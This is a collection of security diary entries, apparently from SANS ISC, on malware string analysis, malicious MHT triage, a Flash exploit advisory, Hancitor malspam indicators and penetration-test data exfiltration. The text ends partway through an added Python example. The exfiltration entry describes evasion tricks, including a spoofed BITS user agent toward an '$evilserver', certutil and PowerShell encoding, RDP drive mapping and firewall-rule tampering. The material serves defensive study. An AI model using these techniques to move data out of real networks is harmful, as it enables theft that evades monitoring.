Quickie: String Analysis is Still Useful, (Sun, Dec 9th)

String analysis: extracting and analyzing strings from binary files (like executables) to assist with reverse engineering.

It’s a simple method, but still useful, if you don’t have to spend hours sifting through all the strings produced by the strings tool. I have a tip to quickly find “interesting” strings: sort the output of the strings tool by string length. Start with the shortest strings, and end with the longest strings.

Take for example the analysis of a malicious document, which involved many steps and required good knowledge of different file formats.

Just by extracting the strings of this document and sorting them by length, you immediately find the PowerShell command:

I developed my own strings.py tool, and its option -L sorts strings by increasing length.
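As an added example (not Didier's strings.py), here is a minimal Python implementation of the same idea: extract ASCII and UTF-16LE strings from a byte buffer and sort them by increasing length, so the long, interesting ones end up at the bottom of the listing. The document bytes are constructed for the demonstration.

```python
import re
from typing import List, Tuple

# Constructed stand-in for a dumped document: binary noise around a few short
# strings, one UTF-16LE string, and a single long command line.
SAMPLE_DOC = (
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 8
    + b"Root Entry" + b"\x00\x03"
    + b"Word.Document.8" + b"\xff\xfe"
    + "Macros".encode("utf-16-le") + b"\x00\x00\x07\x08"
    + b"powershell.exe -NoProfile -Command Get-Date" + b"\x00"
)


def find_strings(data: bytes, min_len: int = 4) -> List[Tuple[str, str]]:
    """Return (encoding, text) pairs for every string of at least min_len characters.

    ASCII strings are runs of printable bytes (0x20-0x7e); UTF-16LE strings are
    the same characters interleaved with NUL bytes, as Windows binaries store them.
    """
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found: List[Tuple[str, str]] = []
    for m in ascii_re.finditer(data):
        found.append(("ascii", m.group().decode("ascii")))
    for m in utf16_re.finditer(data):
        found.append(("utf16le", m.group().decode("utf-16-le")))
    return found


def sort_by_length(strings: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """The -L idea: shortest first, longest last; ties keep discovery order."""
    return sorted(strings, key=lambda item: len(item[1]))


if __name__ == "__main__":
    # The long command line sorts to the end, where it is easy to spot.
    for encoding, text in sort_by_length(find_strings(SAMPLE_DOC)):
        print(f"{len(text):4d} {encoding:8s} {text}")
```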

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

Reader Submission: MHT File Inside a ZIP File, (Sat, Dec 8th)

Reader Jason submitted a ZIP file received via email. It contains an MHT file, and when Jason received it, it had 0 detections on VirusTotal.

When an analyst receives an unknown file with 0 detections on VirusTotal, the analyst will often try to determine whether the file is malicious or not via means other than anti-virus.

For MHT files, Xavier has already explained how they can be malicious in this diary entry.

I take a look at the ZIP file with my zipdump utility:

The extension .mht indicates that it is an MHT file. I use option -e to get more information on the content of the file (together with option -S, to use a comma as separator):

It’s a small file (201 bytes decompressed), and it contains ASCII text: 27 whitespace characters and 174 printable ASCII characters (no NULL bytes, no control characters and no non-ASCII bytes).

An ASCII dump (option -a) confirms it’s text:

And thus I can safely extract the content to my console:

As Xavier explained in his diary entry on MHT files, this MHT file, when opened, will download and open a JAR file (provided Java is installed).

Files that purport to be documents, but actually download and execute programs, are clearly malicious. I often see that very small files like this MHT file, have 0 detections on VirusTotal when they are submitted right at the beginning of the malware campaign. It’s only later, when AV definitions get updated, that the detection rate on VirusTotal increases.
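An added Python example (not Didier's zipdump) of the triage walked through above: list the ZIP members, report the decompressed size, classify every byte as whitespace, printable ASCII, NUL, control or non-ASCII, and only treat a member as safe to dump to a console when it is pure text. The ZIP and its .mht member are constructed for the demonstration.

```python
import io
import zipfile
from typing import Dict, List

# Constructed sample member: a tiny text-only MHT-style file (100 bytes), not
# the one Jason submitted.
SAMPLE_MHT = (
    b"MIME-Version: 1.0\r\n"
    b'Content-Type: text/html; charset="us-ascii"\r\n'
    b"\r\n"
    b"<html><body>sample</body></html>\r\n"
)

WHITESPACE = {0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x20}


def build_sample_zip() -> bytes:
    """Build the kind of attachment discussed: a ZIP holding a single .mht member."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("invoice.mht", SAMPLE_MHT)
    return buf.getvalue()


def classify_bytes(data: bytes) -> Dict[str, int]:
    """Count bytes per class, the way zipdump -e summarises a member's content."""
    counts = {"whitespace": 0, "printable": 0, "null": 0, "control": 0, "non_ascii": 0}
    for b in data:
        if b == 0:
            counts["null"] += 1
        elif b in WHITESPACE:
            counts["whitespace"] += 1
        elif 0x21 <= b <= 0x7E:
            counts["printable"] += 1
        elif b < 0x80:
            counts["control"] += 1
        else:
            counts["non_ascii"] += 1
    return counts


def is_plain_text(counts: Dict[str, int]) -> bool:
    """Text only when there are no NUL, control (other than whitespace) or non-ASCII bytes."""
    return counts["null"] == 0 and counts["control"] == 0 and counts["non_ascii"] == 0


def triage_zip(zip_bytes: bytes) -> List[Dict]:
    """One row per member: name, extension, decompressed size, byte classes, text flag."""
    rows: List[Dict] = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            data = zf.read(info)
            counts = classify_bytes(data)
            name = info.filename
            rows.append({
                "name": name,
                "extension": name.rsplit(".", 1)[-1].lower() if "." in name else "",
                "size": info.file_size,          # uncompressed size
                "counts": counts,
                "text": is_plain_text(counts),
            })
    return rows


if __name__ == "__main__":
    zip_bytes = build_sample_zip()
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for row in triage_zip(zip_bytes):
            print(row["name"], row["extension"], row["size"], row["counts"])
            if row["text"]:
                # Only pure text gets dumped to the console; anything else stays in the sandbox.
                print(zf.read(row["name"]).decode("ascii"))
```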

When I performed the initial analysis, the JAR file was no longer available.


Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

Is it Time to Update Flash? (If you haven’t already), (Thu, Dec 6th)

If you haven’t uninstalled Flash yet, maybe today should be that day.  The update posted yesterday fixes a vulnerability that already has a remote code execution proof-of-concept here:
https://github.com/smgorelik/Windows-RCE-exploits/blob/master/Documents/Office%2BFlash/CVE-2018-15982_%23PoC%23.zip

And Gigamon has posted that it’s being seen in the wild already:
https://atr-blog.gigamon.com/2018/12/05/adobe-flash-zero-day-exploited-in-the-wild/


===============
Rob VandenBrink
Compugen

Adobe Releases Security Updates

Original release date: December 06, 2018

Adobe has released security updates to address vulnerabilities in Adobe Flash Player and Adobe Flash Player installer. An attacker could exploit some of these vulnerabilities to take control of an affected system.

NCCIC encourages users and administrators to review Adobe Security Bulletin APSB18-42 and apply the necessary updates.


Data Exfiltration in Penetration Tests, (Tue, Nov 27th)

In many penetration tests, there’ll be a point where you need to exfiltrate some data.  Sometimes this is a situation of “OK, we got the crown jewels, let’s get the data off premise”.  Or sometimes in this phase of the test the goal is “let’s make some noise and see if they’re watching for data exfiltration – hmm, nothing yet, let’s make some LOUDER noise and see (and so on)”.  As with most things, there’s a spectrum of methods to move the target data out, with various levels of difficulty for detection.

At the basic end of the spectrum, moving the data in clear text is a good test at the “are they even monitoring” end of things.  “Living off the land” (using native operating system tools) is usually the preferred approach in my gigs – so the obvious method is to try FTP – there’s an FTP client on pretty much every workstation and server OS on the planet.  If you are moving identified target data (credit card information, customer account information, other PII, engineering drawings, source code or other intellectual property), this should trigger some DLP (Data Loss Protection) detection at the perimeter – often this is coded into the firewall.

What else should see this?  Really, outbound FTP shouldn’t work – your client should have an egress filter on their firewall – outbound clear text file transfers to random hosts shouldn’t be allowed.  But say it’s allowed.  Firewall logs will definitely show the transfer, but if there’s no egress filter, chances are nobody’s watching the logs of the “noisiest” piece of infrastructure in the fleet – firewall logs can easily top 5GB per day, even in a small-ish organization.

A simple “cat todayslog.txt | grep /21 | grep -i permit” will show your successful exfil in the logs.  If there’s an egress filter, you’d be looking for a blocked transfer, which would look more like:
cat todayslog.txt | grep /21 | grep -i deny

If the client has Netflow running for their perimeter, Netflow will show to/from traffic by protocol, so if they’re running netflow telemetry from the firewall to a collector, your client will have you on film, with pictures (again, if they are looking).

OK, say you need to ramp it up a notch?  If you’re able to transfer any tools in (or if you’ve popped a Linux host), netcat (or ncat, if you’ve got an nmap install you can use) is your friend – or you can use any number of PowerShell or Python implementations of netcat if you’d rather stick to running native tools.  This will allow you to exfiltrate data, still in clear text, to a host ready to receive it – it just won’t look like FTP.

This will be tougher to see, because you’re exiting out on a different port.  You might think “let’s pick 1337, that’s a really cool “leet” port”, or some other random port.  But that will pop up as an outlier in any tool if they’re looking at traffic.  Not only will DLP see the data right away, but it’ll pop up as “odd” to any log monitoring tool or netflow collector.

Maybe source it from a random port and use 80 or 443 as a target port?  We still see lots of folks that say “tcp/443 is encrypted, we won’t even inspect it”.  Or better yet, if you are exfiling from a server with an inbound web service, using ncat or similar with the ports reversed – source port of 443 and destination some random port – to an unsuspecting eye or poorly configured tool, this will look like inbound traffic to a legitimate service.  Except maybe for the volume of data leaving, that is…

Let’s scramble the data – maybe they won’t detect these same cleartext methods, but let’s base64 the data first?  If you are operating from a customer *nix server that’s easy, but if you’re on a Windows host, you can base64 encode data just using certutil (included on every Windows host on the planet):
certutil -encode c:\foo\data.binortext c:\foo\scrambledata.asc
and
certutil -decode c:\foo\scrambleddata.asc unscrambleddata.txtorbin

PowerShell is a nice tool for encoding and decoding too – first, let’s encode:

PS L:datareadytoexfil.source> $test = “this is some target data.  for larger files, use get-content instead of direct assignment”
PS L:datareadytoexfil.source> $test2 = [System.Convert]::ToBase64String([System.Text.Encoding]::UNICODE.GetBytes($test))
PS L:datareadytoexfil.source> $test2
dABoAGkAcwAgAGkAcwAgAHMAbwBtAGUAIAB0AGEAcgBnAGUAdAAgAGQAYQB0AGEALgAgACAAZgBvAHIAIABsAGEAcgBnAGUAcgAgAGYAaQBsAGUAcwAsACAAdQBzAGUAIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIABpAG4AcwB0AGUAYQBkACAAbwBmACAAZABpAHIAZQBjAHQAIABhAHMAcwBpAGcAbgBtAGUAbgB0AA==

Now, after you’ve moved the data, you’ll need to decode that data:

PS C:exfil.destination> $test3 = [System.Text.Encoding]::UNICODE.GetString([System.Convert]::FromBase64String($test2))
PS C:exfil.destination> $test3
this is some target data.  for larger files, use get-content instead of direct assignment

(Thanks Jeffrey Snover and his 2006 blog post on this!   https://blogs.msdn.microsoft.com/powershell/2006/04/25/base64-encodedecode-a-string/  )

OK, let’s say that your client is equipped to see all of this so far (base64 encoding really should be triggering alarms) – how would you kick it up a level and exfil data using real encryption?

An SSH Tunnel or a straight up SCP file transfer is a favourite for this.  Hopefully the client has a simple rule on their firewall though that only allows this from specific hosts or specific user accounts.  This would mean that your transfer will either be a block/alert thing for them, or worst case a permit/alert thing.

If they permit it, you can try just uploading your data to a public HTTPS repo.  A well configured firewall should mostly catch this though – for instance:

  • dropbox, onedrive and the like – traditional clients should normally have a “we store our data here” policy – so this sort of site really should be blocked unless your compromised account is in a group with access to one or more of these general purpose “stash your files here” sites.  Of course if your client has a “the cloud is sparkly and can do no wrong” outlook, this is the perfect way to exfiltrate your data.
  • Similarly, github should be restricted for most users – however, if you can compromise a developer account it makes a dandy target and will usually work.

What if you’re trying to trigger an alert?  OK, try sending your exfil via HTTPS to pastebin – there shouldn’t be a legitimate need to access pastebin for most folks.  Hopefully any well configured firewall will block and alert on this one!

What’s the next most difficult method to see?  OK, we’ll go back to cleartext for this one, but most folks won’t be looking at their own remote access VPN for data exfiltration.  If they use single factor authentication (userid and password, usually back-ended with Active Directory), then this is a great method of moving lots of data.  Because why would they block that?  In most cases management is in favour of people working after hours from home!  That is, until you ask what happens if that salesperson who left last week managed to exfil your entire client list, current pricing matrix and maybe all the RFPs that are currently in flight.  (This exfil method is a great way to make this point.)

Let’s say you want to use an encrypted data transfer direct to your $evilserver?  OK, curl will do that, but it’ll look like curl.  Changing the useragent will help, but changing it to match Firefox or Chrome won’t change the $evilserver destination.  Hmmm – what service is usually whitelisted right near the top of the firewall list?   Yup, you guessed it, let’s make our traffic look like Windows Update – let’s change the user agent to look like a Microsoft BITS (Background Intelligent Transfer Service) file transfer.  Change the curl useragent to “Microsoft BITS/7.5” and very likely you won’t have any trouble at all getting your data out.  Often you don’t even need to encrypt it; send it out in clear text on port 443 with that useragent, and you’ll sail past everyone’s “Next Generation” firewall, IPS or whatever.

You can move data using BITSADMIN (in most Windows versions), or if you are in a newer windows version, just use the BITS commands in Powershell.

Other methods?  If there’s an inbound RDP service (either native or an RDS gateway), RDP in, and map a drive back to your client with “net use v: \\tsclient\sharename”.  Now you can use xcopy, robocopy or whatever to move data in or out, and it’ll all be encrypted using a legitimate protocol that the client expects to see, and very (very) likely is not decrypting.  Their only hope of detection will be the target address.  If their RDS gateway allows full access from the internet, then they’re out of luck.  You’d also be surprised how many organizations allow *outbound* RDP (no matter how bad that idea is) to any target host.  If that’s the case, you can RDP back to your $evilserver from any internal customer host, map a drive back to the client host and move data using this exact same method!

One thing to note – we discussed these things more or less in order of difficulty, this isn’t normally the order you try things in.  Most often, I’ll start with the toughest ones to detect, then work my way down successively to the easier ones until I’m “caught”.  In most cases, you *want* to be caught at some point, so that you can have the conversation about what was seen and was not seen.  If you get all the way down to a plain old FTP of cleartext data and are still undetected, it’s time for a serious conversation about perimeter configs, logging and alerting 🙂

A common thread to all of this is that if your client has a “next gen” firewall, they are not safe.  If you’ve compromised AD, usually you can create a dummy user and put that user in a group that has permissions to exfiltrate the data, so that the firewall just lets it sail on through.  Change logging in AD should alert your client to this sort of activity. Or if you’re able to leverage your AD access to then login to the firewall as an admin, you’ll be able to (with permission of course), permit your exfiltrated data to pass outbound with no logging or alerting, then delete that rule.  Change logging on your firewall should catch this immediately.  If you aren’t logging admin activities on the firewall, or at least backing up your firewalls and running “diff” against yesterday’s backups, then you need to be doing that (this really is a recommendation we were making 10-15-20 years ago).
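As an added, defender's-side example (not from the original diary), here is a small Python pass over constructed firewall log lines that flags the patterns described above: permitted or denied outbound FTP, an unexpected egress port, reversed source/destination ports, a BITS user agent talking to a host outside the expected update servers, and outbound RDP. The log format, the internal address range, the expected egress ports and the BITS host allowlist are all assumptions of this example.

```python
import ipaddress
import re
from typing import Dict, List, Optional

# Constructed, simplified log lines for the demonstration.  The format
# (action proto src/port -> dst/port [host=...] [ua="..."]) is an assumption
# of this example, not any vendor's real firewall or proxy log format.
SAMPLE_LOG = """\
permit tcp 10.1.1.20/51822 -> 203.0.113.9/21
deny tcp 10.1.1.21/51901 -> 203.0.113.9/21
permit tcp 10.1.1.20/443 -> 198.51.100.77/52077
permit tcp 10.1.1.30/49211 -> 198.51.100.80/1337
permit tcp 10.1.1.30/49212 -> 198.51.100.80/443 host=files.example.test ua="Microsoft BITS/7.5"
permit tcp 10.1.1.30/49213 -> 198.51.100.81/443 host=download.windowsupdate.com ua="Microsoft BITS/7.5"
permit tcp 10.1.1.31/49300 -> 198.51.100.90/3389
permit tcp 10.1.1.40/49400 -> 198.51.100.10/443 host=www.example.test ua="Mozilla/5.0"
"""

# Assumptions for this example: the client's internal range, the ports a
# workstation is expected to reach directly, and the hosts BITS may talk to.
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]
EXPECTED_EGRESS_PORTS = {53, 80, 443}
BITS_ALLOWED_HOSTS = {"download.windowsupdate.com"}
SERVICE_PORTS = {80, 443}   # a source port here on an outbound flow looks like a reply

LINE_RE = re.compile(
    r"^(?P<action>permit|deny)\s+(?P<proto>tcp|udp)\s+"
    r"(?P<src>[\d.]+)/(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+)/(?P<dport>\d+)"
    r"(?:\s+host=(?P<host>\S+))?"
    r'(?:\s+ua="(?P<ua>[^"]*)")?\s*$'
)


def parse_line(line: str) -> Optional[Dict]:
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["sport"] = int(rec["sport"])
    rec["dport"] = int(rec["dport"])
    return rec


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def evaluate(rec: Dict) -> List[str]:
    """Return the names of the exfiltration indicators an outbound record matches."""
    findings: List[str] = []
    if not (is_internal(rec["src"]) and not is_internal(rec["dst"])):
        return findings                      # only outbound flows are of interest here
    permitted = rec["action"] == "permit"
    if rec["dport"] == 21:                   # the "grep /21 | grep permit|deny" check
        findings.append("ftp-egress-permitted" if permitted else "ftp-egress-blocked")
    if permitted and rec["dport"] == 3389:   # outbound RDP to an arbitrary host
        findings.append("outbound-rdp")
    if permitted and rec["sport"] in SERVICE_PORTS and rec["dport"] >= 1024:
        findings.append("reversed-ports")    # source 443, random destination port
    if permitted and rec["dport"] not in (EXPECTED_EGRESS_PORTS | {21, 3389}):
        findings.append("unexpected-egress-port")   # e.g. the "leet" port outlier
    ua = rec.get("ua") or ""
    if ua.startswith("Microsoft BITS") and rec.get("host") not in BITS_ALLOWED_HOSTS:
        findings.append("bits-useragent-to-unexpected-host")
    return findings


def analyze(log_text: str) -> Dict[int, List[str]]:
    """Map 1-based line numbers to the indicators fired on that line."""
    results: Dict[int, List[str]] = {}
    for number, line in enumerate(log_text.splitlines(), start=1):
        rec = parse_line(line)
        if rec is not None:
            hits = evaluate(rec)
            if hits:
                results[number] = hits
    return results


if __name__ == "__main__":
    for number, hits in analyze(SAMPLE_LOG).items():
        print(f"line {number}: {', '.join(hits)}")
```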

What did I miss?  Sure, you can do exactly this job with metasploit, unicorn or any number of other tools, but if possible I try to stick with what I can use on the host OS – the things that the client expects to see either from regular users or regular system administrators.   Using native tools to accomplish malicious goals will usually make a bigger impact in your report.

Even with that “living off the land” approach, I’m sure that I’ve missed other methods of data exfiltration – what native methods have you used to exfiltrate data?  What methods worked, what methods got caught and how?  Use our comment form to fill us in!

===============
Rob VandenBrink
Compugen

Apple Releases Multiple Security Updates

Original release date: December 05, 2018

Apple has released security updates to address vulnerabilities in multiple products. An attacker could exploit some of these vulnerabilities to take control of an affected system.

NCCIC encourages users and administrators to review the Apple security pages for the following products and apply the necessary updates:


Campaign evolution: Hancitor changes its Word macros, (Wed, Dec 5th)

Introduction

Today’s diary reviews trends in recent malicious spam (malspam) pushing Hancitor.

Background:  Malspam pushing Hancitor (also known as Chanitor or Tordal) is a long-running campaign.  In recent months, we’ve often seen waves of Hancitor malspam 2 or 3 times each week.  Infections from this malspam tend to follow predictable patterns, and have ended with Ursnif as the follow-up malware since the end of October 2018 (previously it had been Zeus Panda Banker).

Recent activity:  After a wave of malspam on 2018-10-29, this campaign went silent, and we saw no new Hancitor malspam for one month.  Last week on Thursday 2018-11-29, Hancitor malspam returned with changes to the macro code in the associated Word documents.  Hancitor is still sending Ursnif as its follow-up malware.

Today’s diary reviews an infection from Hancitor malspam seen on Tuesday 2018-12-04.


Shown above:  Flow chart for the Hancitor infection on Tuesday 2018-12-04.

The malspam


Shown above:  Screen shot from an email in this malspam wave.

The email template for Tuesday’s malspam was eFax-themed, which is something we’ve occasionally seen from this campaign.  No big surprises here.  And the link to download a Word document follows the same pattern of ASCII characters at the end, where all characters after the = sign are an encoded string that represents the recipient’s email address.  I’m still not sure how to decode these strings.

Below is an example of the email headers from one of the messages on Tuesday:

Received: from lenoxia.com ([169.203.179.39]) by [removed] for [removed];
        Tue, 04 Dec 2018 15:38:56 +0000 (UTC)
Date: Tue, 04 Dec 2018 08:40:58 -0700
MIME-Version: 1.0
X-Mailer: iPad Mail (11D169b)
Content-Transfer-Encoding: 7bit
Subject: This is an automatic eFax Notification
Message-ID: <1563DCE3.5F979EAC@lenoxia.com>
From: "eFax, Inc." <efax@lenoxia.com>
Content-Type: text/html;
    charset="utf-8"
TO: [removed]
Reply-To: "eFax" <efax@lenoxia.com>


At first glance, the downloaded Word document looks similar to those seen in previous waves of Hancitor malspam.  Victims must enable macros to infect a vulnerable Windows host.  However, the macros act noticeably different than before (more on that later).


Shown above:  Downloading a Word document from a link in the malspam.

Infection traffic

Infection traffic follows the same patterns we’ve previously seen for Hancitor, except with additional infection traffic for Ursnif instead of Zeus Panda Banker.  In this case, I also saw Tor traffic, which might be related to the Ursnif activity.  An HTTP request to amalu[.]at returned an encoded binary about 2.2 MB in size, which matched a malware binary I found on the infected Windows host for Send Safe Enterprise (SSE) spambot malware.  I also saw the UDP beaconing traffic associated with SSE spambot malware.


Shown above:  The initial infection traffic filtered in Wireshark, showing Hancitor and Ursnif traffic.


Shown above:  Later in the infection, we find Tor traffic.


Shown above:  Infected host retrieves SSE spambot executable (encoded when sent over the network).


Shown above:  UDP beaconing traffic caused by SSE spambot malware.

Forensics on the infected host

Unlike previous Hancitor Word docs, ever since Hancitor reappeared on 2018-11-29, the Word documents are noticeably larger, and they contain ASCII-based hex code that is decoded as two executable files dropped after enabling macros.  These two executables are named werd.exe and wird.exe, and they’re dropped to the user’s AppData\Roaming directory.  A folder also appeared in the AppData\Roaming directory with links copied from the desktop of my infected Windows host.  I also saw folders named msohtmlclip and msohtmlclip1 that were created in the user’s AppData\Local\Temp directory.

Ursnif was made persistent through about 14MB of ASCII code stored as Windows registry entries.  This is normal for Ursnif infections, and I’ve exported a copy of these registry entries so people can review them.  See the link at the end of this diary to access the data.

Finally, SSE spambot malware was stored in the user’s AppData\Local\Temp directory using random digits in the filename.
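As an added example (not Brad's analysis tooling), the following Python scans a document's bytes for long runs of ASCII hex, decodes each run, and checks whether the result carries a PE header (an "MZ" stub whose e_lfanew field points at a "PE\0\0" signature), which is the pattern the diary describes for these Word documents. The document bytes and the stand-in executable are constructed for the demonstration.

```python
import re
from typing import Dict, List


def build_fake_pe() -> bytes:
    """Constructed 128-byte stand-in for a dropped executable: an 'MZ' header
    whose e_lfanew (offset 0x3C) points at a PE signature.  Not a real program."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    dos[0x3C:0x40] = (0x40).to_bytes(4, "little")
    return bytes(dos) + b"PE\x00\x00" + b"\x00" * 60


# Constructed document body: macro-looking text with the stand-in executable
# embedded as one long hex string, plus an unrelated short run of digits.
SAMPLE_DOC = (
    b"Sub AutoOpen()\r\n"
    + b'    payload = "' + build_fake_pe().hex().encode("ascii") + b'"\r\n'
    + b"    serial = 1234567890\r\n"
    + b"End Sub\r\n"
)


def looks_like_pe(raw: bytes) -> bool:
    """True when raw starts with an MZ stub whose e_lfanew points at 'PE\\0\\0'."""
    if len(raw) < 0x40 or raw[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(raw[0x3C:0x40], "little")
    return raw[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def find_hex_blobs(data: bytes, min_bytes: int = 64) -> List[Dict]:
    """Locate runs of ASCII hex that encode at least min_bytes, decode each run,
    and report its offset, decoded length and whether it looks like a PE file."""
    pattern = re.compile(rb"(?:[0-9A-Fa-f]{2}){%d,}" % min_bytes)
    blobs: List[Dict] = []
    for m in pattern.finditer(data):
        raw = bytes.fromhex(m.group().decode("ascii"))
        blobs.append({
            "offset": m.start(),
            "decoded_len": len(raw),
            "is_pe": looks_like_pe(raw),
        })
    return blobs


if __name__ == "__main__":
    for blob in find_hex_blobs(SAMPLE_DOC):
        verdict = "embedded PE" if blob["is_pe"] else "hex run, not a PE"
        print(f"offset {blob['offset']}: {blob['decoded_len']} bytes, {verdict}")
```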


Shown above:  werd.exe and wird.exe dropped to the user’s AppData\Local\Temp directory.


Shown above:  More artifacts from the infected Windows host.


Shown above:  Windows registry entries created by Ursnif on the infected Windows host.

Indicators

The following are indicators from an infected Windows host.  Any malicious URLs, IP addresses, and domain names have been “de-fanged” to avoid any issues when viewing today’s diary.

URL from the malspam text to download the initial Word document:

  • 47.89.18[.]253 port 80 – your365realestateoffice[.]com – GET /?[string of characters]=[string of characters representing recipient’s email address]

Hancitor infection traffic after enabling Word macros:

  • port 80 – api.ipify.org – GET /  (IP address check by the infected host, not inherently malicious)
  • 191.101.20[.]16 port 80 – ninglarenlac[.]com – POST /4/forum.php
  • 191.101.20[.]16 port 80 – ninglarenlac[.]com – POST /mlu/forum.php
  • 191.101.20[.]16 port 80 – ninglarenlac[.]com – POST /d2/about.php
  • 131.72.236[.]103 port 80 – todoemergencias[.]cl – GET /wp-includes/1
  • 131.72.236[.]103 port 80 – todoemergencias[.]cl – GET /wp-includes/2
  • 131.72.236[.]103 port 80 – todoemergencias[.]cl – GET /wp-includes/3

Ursnif infection traffic:

  • 47.52.45[.]178 port 80 – api2.doter[.]at – GET /webstore/[long string]
  • 47.52.45[.]178 port 80 – 47.52.45[.]178 – GET /favicon.ico
  • 47.52.45[.]178 port 80 – beetfeetlife[.]bit – GET /webstore/[long string]
  • 47.52.45[.]178 port 80 – beetfeetlife[.]bit – GET /jvassets/o1/s64.dat

Tor traffic seen after the initial Hancitor and Ursnif activity:

  • various IP addresses over mostly port 80 – GET /tor/status-vote/current/consensus
  • various IP addresses over mostly port 80 – GET /tor/server/fp/[long hex string]
  • various IP addresses over port 443 – SSL/TLS traffic

Infected host retrieves SSE spambot malware:

  • 46.163.119[.]217 port 80 – amalu[.]at – GET /wp-admin/includes/36s

UDP beacon caused by SSE spambot malware:

  • 31.44.184[.]36 port 50012

Malware from an infected Windows host:

SHA256 hash:  eebc056d535f2b1278df043eee776595b6526e47a6cffdc67641c165b1f5e973

  • File size:  458,240 bytes
  • File description:  Word doc downloaded from email link, doc has macro for Hancitor
  • File name:  invoice_530486.doc   (random digits in the file name)

SHA256 hash:  ad783ca9c2bd4c9905b131d170c1dce5bad9de8b8c2d4607a8cd051021284df0

  • File size:  114,690 bytes
  • File description:  Hancitor malware binary dropped by Word macro
  • File location:  C:\Users\[username]\AppData\Roaming\werd.exe

SHA256 hash:  a1a0cb7e5a7239b7aa69f2d052464c201bd5082d9a8b2aac6997fda5de9a7228

  • File size:  52,226 bytes
  • File description:  Hancitor-related executable dropped by Word macro
  • File location:  C:\Users\[username]\AppData\Roaming\wird.exe

SHA256 hash:  9350609c8c806a9c1a667fd53926ea85745e1da239df7f3c2aad3e3527bd48d1

  • File size:  249,544 bytes
  • File description:  Ursnif executable retrieved by Hancitor-infected host
  • File location:  C:\Users\[username]\AppData\Local\Temp\BNA4D6.tmp   (random characters in the file name)

SHA256 hash:  86ca2f22dd4c99b57bb9d272cd5dd91978e15853efa0c05ede8c80694a8d27a6

  • File size:  2,163,976 bytes
  • File description:  Send Safe Enterprise (SSE) spambot malware
  • File location:  C:\Users\[username]\AppData\Local\Temp\1907751.exe   (random digits in the file name)
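The de-fanged indicators above are meant to be turned back into something a defender can search for. The following script is an added example (not code from the diary or from ISC): it re-fangs the network indicators listed in this section, matches them against a constructed proxy log in an assumed one-line-per-request format, and checks file contents against the SHA256 hashes listed above. The log format, the RFC 5737 documentation addresses used for non-malicious destinations, and the helper names are all assumptions for the example; only the indicator values are taken from the diary. Indicator lines whose path is a placeholder such as "[long string]" are matched as path prefixes.

```python
"""Re-fang and match the Hancitor/Ursnif/SSE indicators from the diary above.

Added example: the log format and helper names are assumptions, the indicator
values are copied from the diary's "Indicators" section.
"""
import hashlib
import re
from typing import Dict, List, Optional

# Network indicators copied from the diary. The api.ipify.org check and the
# Tor consensus fetches are left out on purpose: they are not inherently malicious.
DEFANGED_INDICATORS = """
191.101.20[.]16 port 80 – ninglarenlac[.]com – POST /4/forum.php
191.101.20[.]16 port 80 – ninglarenlac[.]com – POST /mlu/forum.php
191.101.20[.]16 port 80 – ninglarenlac[.]com – POST /d2/about.php
131.72.236[.]103 port 80 – todoemergencias[.]cl – GET /wp-includes/1
47.52.45[.]178 port 80 – api2.doter[.]at – GET /webstore/[long string]
47.52.45[.]178 port 80 – beetfeetlife[.]bit – GET /jvassets/o1/s64.dat
46.163.119[.]217 port 80 – amalu[.]at – GET /wp-admin/includes/36s
"""

# SHA256 hashes of the five samples listed in the diary (lower-case hex).
KNOWN_BAD_SHA256 = {
    "eebc056d535f2b1278df043eee776595b6526e47a6cffdc67641c165b1f5e973",  # invoice_*.doc
    "ad783ca9c2bd4c9905b131d170c1dce5bad9de8b8c2d4607a8cd051021284df0",  # werd.exe
    "a1a0cb7e5a7239b7aa69f2d052464c201bd5082d9a8b2aac6997fda5de9a7228",  # wird.exe
    "9350609c8c806a9c1a667fd53926ea85745e1da239df7f3c2aad3e3527bd48d1",  # Ursnif
    "86ca2f22dd4c99b57bb9d272cd5dd91978e15853efa0c05ede8c80694a8d27a6",  # SSE spambot
}

# One diary indicator line: "<ip> port <n> – <host> – <METHOD> <path>" (en dash or hyphen).
INDICATOR_RE = re.compile(
    r"^(?P<ip>\S+) port (?P<port>\d+) [–-] (?P<host>\S+) [–-] (?P<method>[A-Z]+) (?P<path>\S.*)$"
)

# Assumed proxy log line: "<ts> <client> <dst_ip>:<port> <METHOD> <host> <path> <status>".
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<dst>[^:\s]+):(?P<port>\d+) "
    r"(?P<method>[A-Z]+) (?P<host>\S+) (?P<path>\S+) (?P<status>\d+)$"
)


def refang(value: str) -> str:
    """Undo the diary's de-fanging so values compare equal to real log fields."""
    return value.replace("[.]", ".")


def parse_indicators(text: str) -> List[Dict[str, object]]:
    """Parse the de-fanged indicator list into comparable records."""
    indicators: List[Dict[str, object]] = []
    for line in text.strip().splitlines():
        m = INDICATOR_RE.match(line.strip())
        if not m:
            continue
        path = m.group("path")
        prefix_only = "[" in path          # "[long string]" placeholders become prefixes
        if prefix_only:
            path = path.split("[", 1)[0]
        indicators.append({
            "ip": refang(m.group("ip")),
            "port": m.group("port"),
            "host": refang(m.group("host")),
            "method": m.group("method"),
            "path": path,
            "prefix_only": prefix_only,
        })
    return indicators


def match_log_line(line: str, indicators: List[Dict[str, object]]) -> Optional[Dict[str, object]]:
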